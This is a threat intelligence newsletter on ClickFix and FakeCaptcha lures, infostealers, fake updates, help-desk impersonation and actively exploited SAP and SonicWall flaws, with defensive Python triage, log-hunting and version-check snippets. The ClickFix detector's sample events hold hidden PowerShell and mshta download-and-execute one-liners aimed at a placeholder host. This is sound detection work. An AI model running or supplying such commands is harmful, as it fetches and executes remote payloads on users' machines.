
Cyber Threat Intelligence Report


This week, we briefed our clients on the threat actor tactics and techniques we are seeing this year, as AI lowers the barrier to entry for cybercriminals.

 

 KEY TAKEAWAYS 

  • Shields Up! ClickFix, FakeCaptcha, Infostealers, Fake Updates, Fake Helpdesk, and KEVs on the rise!

  • Microsoft Recall has been released to the public; ensure it is disabled in your organization.

  • Critical vulnerabilities in SAP and SonicWall under active exploitation. Patch now!




 

Shields Up!

It's no secret that cybersecurity threats are increasing across the board. Threat actors are continually inventing new tactics and techniques to compromise organizations. Widespread adoption of AI tools has lowered the barrier to entry for cybercriminals and has also shortened the time it takes to weaponize exploits. In 2025, a handful of these techniques have emerged as serious threats that all organizations need to be aware of and defend against.

 

ClickFix/Fake CAPTCHA

These techniques are not new, and PacketWatch has reported on them many times. However, they have been abused by an increasingly wide range of threat actors in recent months. While the techniques differ technically, they fall into the same threat category: all of them rely on tricking the user into loading malicious files themselves.

ClickFix attacks trick the user into believing there is an error with the webpage they are trying to view. In order to "fix" the problem, the user is told to open a command shell, paste in malicious PowerShell or JavaScript code, and execute it. This code then downloads and executes the malicious payload. Users are directed to these sites via links embedded in phishing emails, or through watering-hole style attacks that rely on SEO poisoning. This technique has been used by APT groups from North Korea, Iran, and Russia, as well as several ransomware groups.

FakeCaptcha attacks are very similar to ClickFix. The user is presented with a CAPTCHA page where they are prompted to open a command terminal and copy/paste malicious PowerShell or JavaScript code and execute it. This, in turn, downloads and executes further malicious payloads. In addition to ransomware, this infection method has also been documented to deliver another growing threat: Infostealers.
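Because both ClickFix and FakeCaptcha end with the user pasting a one-liner into a Run dialog or terminal, the process tree is a reliable detection point: explorer.exe spawning a script host with a download-and-execute command line. The following triage function is an added example (not PacketWatch code) and runs over constructed events modelled on Sysmon Event ID 1 fields; the field names and the host URLs are assumptions.

```python
"""Triage process-creation events for ClickFix / FakeCaptcha style executions."""
import re

# Script hosts that ClickFix lures typically ask the user to launch via Win+R.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Hallmarks of a "download and run" one-liner (case-insensitive).
DOWNLOAD_CUES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|\biex\b|invoke-expression|"
    r"-enc\w*\s+[a-z0-9+/=]{20,}|mshta\s+https?://|https?://)",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_candidate(event: dict) -> bool:
    """True when explorer.exe (parent of the Run dialog) spawns a script host
    whose command line carries a download/execute cue."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return parent == "explorer.exe" and image in SCRIPT_HOSTS \
        and bool(DOWNLOAD_CUES.search(cmd))

def triage(events):
    """Return only the events worth an analyst's attention."""
    return [e for e in events if is_clickfix_candidate(e)]

# Constructed sample events (not real telemetry); .invalid is a reserved TLD.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",   # legitimate dev workflow
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # benign Run-dialog use
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit["CommandLine"])
```

Tune SCRIPT_HOSTS and DOWNLOAD_CUES to your environment; the explorer.exe parent check is what keeps ordinary scripted PowerShell use out of the results.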

 

Infostealers

This type of malware is not new; however, its use has been rising steadily. In the recently published M-Trends 2025 report from Google, stolen credentials accounted for over 16% of initial infections, a figure strongly tied to the proliferation of infostealer malware. Infostealers pose a significant challenge to enterprises because personal devices are used for work functions: work credentials can be stolen if they have been synchronized to a personal device through the browser. Infostealers are delivered to victims in a variety of ways. They are commonly bundled with cracked/pirated software but are increasingly distributed through ClickFix/FakeCaptcha campaigns.

 

Fake Updates

One of the most notorious "Fake Update" malware campaigns is known as SocGholish. This "loader" malware has been observed since at least 2017 and is still one of the top initial infection methods today. Threat actors compromise legitimate websites with malicious code that prompts the user to download an update for their web browser. These updates are bundled with malicious JavaScript code that facilitates the download and execution of further malicious payloads. Historically, SocGholish was known to download Cobalt Strike beacons to establish persistence after initial access; however, it has recently been observed leading directly to ransomware infections.

 

Fake IT / HelpDesk Support

A growing trend among threat actors is posing as IT support. In these attacks, the threat actor calls the victim by phone, pretending to be from the company's IT department. Through this social engineering tactic, the threat actor convinces the victim to download remote access tools, giving the threat actor full control over the device. They then use this access to download further malicious payloads, often leading to ransomware.

 

Increase in Known Exploited Vulnerabilities

A recent report from VulnCheck shows an increase in the total number of known exploited vulnerabilities in the first quarter of 2025. During this period, a total of 159 CVEs were publicly disclosed as exploited in the wild. Additionally, over 28% of these vulnerabilities were weaponized within 24 hours of vulnerability disclosure. Organizations need to take these timeframes into consideration with their patch management programs, especially for internet-facing edge devices. Ideally, these devices should be patched within 24 hours of CVE disclosure.

 

How to Defend Your Organization

Technical controls are obviously important. Up-to-date EDR on every endpoint and server, staying fully patched, network segmentation, multi-factor authentication and strong passwords, network monitoring, and rigid firewall and web gateway policies will all go a long way toward blocking and preventing many threats. However, a common thread among these emerging threats is that threat actors are increasingly exploiting the human. User awareness training is a must: users must be made aware of these attack trends so they can recognize and avoid them. Additionally, administrators can take steps to limit the damage when humans inevitably make mistakes. Limit administrative roles and permissions for users, block access to unnecessary web content categories, disable command prompt and PowerShell usage where it is not needed, and only allow pre-approved software to be installed on workstations.

 


Total Recall

On April 25, Microsoft announced the rollout of its controversial Recall feature to the general public. Recall continuously snapshots user activity, and leverages AI to allow the user to ask natural language questions about past actions on the computer. This allows the user to quickly find previous activities and past actions. Although Microsoft delayed the release of Recall for almost a year and added multiple safety features that were not included in the initial release, this feature is still a major privacy concern for organizations. Currently, Recall is an 'opt-in' feature, and only works on specific hardware. However, due to its privacy risks, it is recommended that administrators disable this feature via GPO.

 


Vulnerability Roundup

 

SAP Maximum Severity Vulnerability Under Active Exploitation

On April 25, SAP released a security update for CVE-2025-31324. This maximum-severity vulnerability affects SAP NetWeaver Visual Composer 7.xx and allows unauthenticated file upload, which lets threat actors take over the server. SAP has confirmed that this vulnerability has been successfully exploited in attacks. Administrators are urged to patch as soon as possible.

In addition to patching, it is recommended to review server logs for unusual requests to the '/developmentserver/metadatauploader' endpoint. In the attacks observed so far, threat actors have typically uploaded webshells as the first stage of exploitation. These files have been observed in the following folders on SAP servers:

  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
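The two hunting steps above, reviewing logs for the uploader endpoint and checking the listed folders for dropped .jsp files, can be scripted. The following is an added example (not SAP or PacketWatch code): the access-log format is assumed to be Apache common log format, and the log lines, client addresses and file names are constructed samples.

```python
"""Hunt for CVE-2025-31324 activity: uploader requests and files in webshell drop folders."""
import re
from pathlib import PureWindowsPath

UPLOADER_ENDPOINT = "/developmentserver/metadatauploader"

# Folders from the report, relative to the NetWeaver instance root.
WATCHED_DIRS = [
    r"j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root",
    r"j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work",
    r"j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync",
]

# Minimal common-log-format parser (assumed format): client, method, path, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict of the fields we care about, or None for unparseable lines."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def uploader_requests(lines):
    """Every parsed request whose path (query string ignored) is the metadata uploader.
    Any method and any status is kept; a successful POST here is what exploitation looks like."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"].split("?", 1)[0].lower() == UPLOADER_ENDPOINT:
            hits.append(rec)
    return hits

def in_watched_dir(rel_path):
    """True when a .jsp file sits directly in one of the folders where webshells were seen.
    rel_path is relative to the instance root, Windows separators as in the report."""
    p = PureWindowsPath(rel_path)
    return p.suffix.lower() == ".jsp" and any(
        str(p.parent).lower() == d.lower() for d in WATCHED_DIRS)

# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2025:10:01:12 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Apr/2025:10:02:45 +0000] "GET /irj/portal HTTP/1.1" 200 8231',
    'not a log line at all',
]

if __name__ == "__main__":
    for rec in uploader_requests(SAMPLE_LOG):
        print("uploader hit:", rec["client"], rec["method"], rec["status"])
```

Pair the log hits with a directory listing of the three folders; any .jsp whose modification time lines up with an uploader request deserves immediate analysis.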

 



SonicWall SMA100 Vulnerabilities Actively Exploited

On May 1, CISA added two vulnerabilities affecting SonicWall Secure Mobile Access (SMA) devices to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are tracked as CVE-2023-44221 and CVE-2024-38475. The latter, CVE-2024-38475, can lead to unauthorized access and session hijacking, and CVE-2023-44221 can lead to command injection if the attacker has administrative privileges. These vulnerabilities can be chained together to gain access to a logged-in administrator session and execute arbitrary commands.

Both vulnerabilities affect SMA 100 Series devices, including SMA 200, 210, 400, 410, and 500v. CVE-2023-44221 was addressed with version 10.2.1.10-62sv and higher on December 4, 2023. CVE-2024-38475 was addressed with version 10.2.1.14-75sv and higher on December 4, 2024. Proof-of-concept exploit code has been published. Administrators are urged to ensure they are fully patched against both vulnerabilities.
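Checking an SMA fleet against the two fixed versions is easy to get wrong with a plain string comparison, because the "10.2.1.N-NNsv" format sorts lexically, not numerically. The helper below is an added example (not SonicWall or PacketWatch code); the fixed versions are the ones stated above, and the installed versions in the test are constructed samples.

```python
"""Compare SMA 100 series firmware versions against the fixed versions from the report."""
import re

# Fixed versions stated in the report for the SMA 100 series.
FIXED_VERSIONS = {
    "CVE-2023-44221": "10.2.1.10-62sv",
    "CVE-2024-38475": "10.2.1.14-75sv",
}

# major.minor.patch.hotfix with an optional "-<build>sv" suffix.
_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)(?:-(\d+)sv)?$")

def parse_sma_version(text):
    """Turn '10.2.1.14-75sv' into the tuple (10, 2, 1, 14, 75) so it compares numerically.
    A missing build suffix is treated as build 0."""
    m = _VER_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised SMA firmware version: {text!r}")
    return tuple(int(part or 0) for part in m.groups())

def unpatched_cves(installed):
    """CVEs from the report whose fix version is newer than the installed firmware."""
    current = parse_sma_version(installed)
    return [cve for cve, fixed in FIXED_VERSIONS.items()
            if current < parse_sma_version(fixed)]

if __name__ == "__main__":
    for ver in ("10.2.1.14-75sv", "10.2.1.12-73sv", "10.2.1.9-57sv"):   # constructed
        print(ver, "missing:", unpatched_cves(ver) or "nothing")
```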


 


 

This report is provided FREE to the cybersecurity community.

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.